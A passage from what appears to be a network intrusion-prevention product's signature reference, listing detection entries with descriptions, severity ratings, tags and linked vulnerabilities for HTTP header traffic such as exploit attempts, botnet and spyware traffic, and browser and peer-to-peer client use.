About this situation: Bargain Buddy traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Bargain Buddy, Windows not specific, Bargain Buddy not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bargain-Buddy
Description:
Back to top

HTTP_CSH-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in Bourne Again Shell (bash)
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow

About this situation: Buffer overflow exploit against various products detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Novell GroupWise, EMC VMware ESX Server, EMC VMware ESXi Server, Openwsman, CVE2007, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: HTTP-Novell-Groupwise-WebAccess-HTTP-Basic-Authentication-Buffer-Overflow
Openwsman-HTTP-Basic-Authentication-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters

About this situation: Detects format string characters from HTTP Basic authentication
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache mod_auth_ldap, CVE2005, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Apache-Auth_LDAP-Format-String-Vulnerability
Apache-Mod_Auth_Pgsql-Module-Logging-Facility-Format-String-Errors
Description:
Back to top

HTTP_CSH-Bazar-Loader-Backdoor-Malware-Infection-Traffic

About this situation: Bazar Loader or Bazar Backdoor malware infection traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Bazar-Loader-Backdoor-Malware-Infection-Traffic
Description:
Back to top

HTTP_CSH-BigBrother-User-Agent

About this situation: Big Brother System Monitor user-agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Binary-Data-In-Long-Host-Header-Field

About this situation: Detects long HTTP Host header fields with binary data, possible buffer overflow exploit
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-160-2032
Last changed: sgpkg-ips-161-2032
Vulnerability: HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow
Description:
Back to top

HTTP_CSH-BitComet-Client

About this situation: BitComet P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitComet, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-BitDefender-Nimbus-Client-User-Agent

About this situation: BitDefender Nimbus Client user-agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-BitTornado-P2P-Client

About this situation: BitTornado P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-BitTorrent-Client

About this situation: BitTorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-BitTorrent-Over-Port-80

About this situation: BitTorrent usage detected on port 80
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-534-5211
Vulnerability: BitTorrent-Over-Port-80
Description:
Back to top

HTTP_CSH-Blazefind

About this situation: BlazeFind traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, BlazeFind, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Blazefind
Description:
Back to top

HTTP_CSH-Blizzard-Downloader-Usage

About this situation: Blizzard usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Blizzard World of Warcraft, BitTorrent, Any Operating System not specific, BitTorrent not specific, Online Gaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Blizzard-World-Of-Warcraft-Usage
Description:
Back to top

HTTP_CSH-Blizzard-World-Of-Warcraft-Usage

About this situation: World of Warcraft usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Blizzard World of Warcraft, Any Operating System not specific, Online Gaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: Blizzard-World-Of-Warcraft-Usage
Description:
Back to top

HTTP_CSH-Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Blundit detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Blundit, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1209-5242
Vulnerability: Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSH-Blue-Coat-WinProxy-Host-Header-Buffer-Overflow

About this situation: Buffer overflow exploit against Blue Coat WinProxy host header vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, x86, Blue Coat Systems WinProxy, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-920-5242
Vulnerability: Blue-Coat-WinProxy-Host-Header-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Bohu-Trojan-Traffic-Detected

About this situation: Bohu Trojan traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Bohu, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Description:
Back to top

HTTP_CSH-Bookedspace

About this situation: BookedSpace activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, BookedSpace, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Bookedspace
Description:
Back to top

HTTP_CSH-Bredolab-Bot-Activity

About this situation: Bredolab bot activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bredolab-Bot
Description:
Back to top

HTTP_CSH-Broadcastpc

About this situation: BroadcastPC traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, BroadcastPC, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Broadcastpc
Description:
Back to top

HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Brocade Network Advisor detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Brocade Network Advisor, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-1527-5242
Vulnerability: Brocade-Network-Advisor-Dashboardfilereceiveservlet-Filename-Directory-Traversal
Brocade-Network-Advisor-Filereceiveservlet-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSH-Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Brocade Network Advisor detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Brocade Network Advisor, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android

About this situation: Android usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-1-Mobile

About this situation: Android version 1 mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-1-Tablet

About this situation: Android version 1 tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-2-Mobile

About this situation: Android version 2 mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-2-Tablet

About this situation: Android version 2 tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-3-Mobile

About this situation: Android version 3 mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-3-Tablet

About this situation: Android version 3 tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.0-Mobile

About this situation: Android version 4.0 Ice Cream Sandwich mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.0-Tablet

About this situation: Android version 4.0 Ice Cream Sandwich tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.1-Mobile

About this situation: Android version 4.1 Jelly Bean mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.1-Tablet

About this situation: Android version 4.1 Jelly Bean tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.2-Mobile

About this situation: Android version 4.2 Jelly Bean mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.2-Tablet

About this situation: Android version 4.2 Jelly Bean tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.3-Mobile

About this situation: Android version 4.3 Jelly Bean mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.3-Tablet

About this situation: Android version 4.3 Jelly Bean tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.4-Mobile

About this situation: Android version 4.4 KitKat mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-4.4-Tablet

About this situation: Android version 4.4 KitKat tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-5.0-Mobile

About this situation: Android version 5.0 Lollipop mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-5.0-Tablet

About this situation: Android version 5.0 Lollipop tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-5.1-Mobile

About this situation: Android version 5.1 Lollipop mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Android-5.1-Tablet

About this situation: Android version 5.1 Lollipop tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-iPad

About this situation: iPad usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-iPhone

About this situation: iPhone usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Linux

About this situation: Linux operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Linux, Any Hardware, Linux not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-1771-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Linux-CentOS

About this situation: Linux operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Linux, Any Hardware, Linux not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Mac-OS-X

About this situation: Apple Mac OS X operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Mac-OS-X-Leopard

About this situation: Apple Mac OS X Leopard operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Mac-OS-X-Snow-Leopard

About this situation: Apple Mac OS X Snow Leopard operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Mobile

About this situation: Unidentified Android version mobile usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Tablet

About this situation: Unidentified Android version tablet usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Android, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-2000

About this situation: Windows 2000 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows 2000, Any Hardware, Windows 2000 not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-2003

About this situation: Windows 2003 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows 2003, Any Hardware, Windows 2003 not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-7

About this situation: Windows 7 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows 7, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-8

About this situation: Windows 8 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows 8, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-8.1

About this situation: Windows 8.1 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows 8.1, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-98

About this situation: Windows 98 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 3
Tags: Windows 98, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone

About this situation: Windows Phone usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone-7

About this situation: Windows Phone version 7 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone-7.5

About this situation: Windows Phone version 7.5 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone-7.8

About this situation: Windows Phone version 7.8 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone-8

About this situation: Windows Phone version 8 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Phone-8.1

About this situation: Windows Phone version 8.1 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: OS X, Any Hardware, OS X not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-Vista

About this situation: Windows Vista operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 1
Tags: Windows Vista, Any Hardware, Windows Vista not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-XP

About this situation: Windows XP operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 5
Tags: Windows XP, Any Hardware, Windows XP not specific, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Browser-User-Agent-Windows-XP-SP2

About this situation: Windows XP SP2 operating system detected from browser User-Agent field
Context: HTTP Request Header Line
Severity: 5
Tags: Windows XP SP2, Any Hardware, Browser Platforms, TCP Client Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-BTSP-P2P-Client

About this situation: BTSP P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Bugbear-Worm-Download

About this situation: A download that is linked to the BugBear worm was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Bugbear-Worm
Description:
Back to top

HTTP_CSH-Cacti-Group-Cacti-Remote_Agent-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cacti Group Cacti detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cacti, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1543-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Cacti-Group-Cacti-Remote_Agent-Command-Injection
Description:
Back to top

HTTP_CSH-Carberp-Botnet-Traffic-Detected

About this situation: Carberp Botnet traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Carberp, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Carberp-Botnet
Description:
Back to top

HTTP_CSH-CashBack-Buddy-Activity

About this situation: CashBack Buddy activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, CashBack Buddy, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-920-5242
Vulnerability: Bargain-Buddy
Description:
Back to top

HTTP_CSH-Chrome-Browser-Usage

About this situation: Chrome browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Small Business RV series of VPN/routers detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Small Business RV VPN/Routers, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection
Description:
Back to top

HTTP_CSH-Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439

About this situation: An attempt to exploit a vulnerability in Cisco Smart Licensing Utility detected
Context: HTTP Request Header Line
Severity: 7
